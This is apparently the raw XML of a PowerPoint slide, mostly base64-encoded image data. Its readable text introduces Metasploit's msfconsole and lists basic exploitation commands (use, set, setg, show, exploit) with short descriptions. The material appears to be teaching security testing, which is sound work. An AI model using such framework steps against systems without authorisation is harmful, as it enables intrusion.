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6354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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MEtasploit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41842" y="1219200"/>
            <a:ext cx="8181974" cy="5029200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Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Exploitation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use &lt;module&gt; - sets exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>auxillary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/etc. to use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>set &lt;x X&gt; - set a parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;x X&gt; - set a parameter globally</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>show &lt;x&gt; - lists all available x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exploit – runs the selected module</a:t>
            </a:r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</p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,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9" descr="data:image/jpeg;base64,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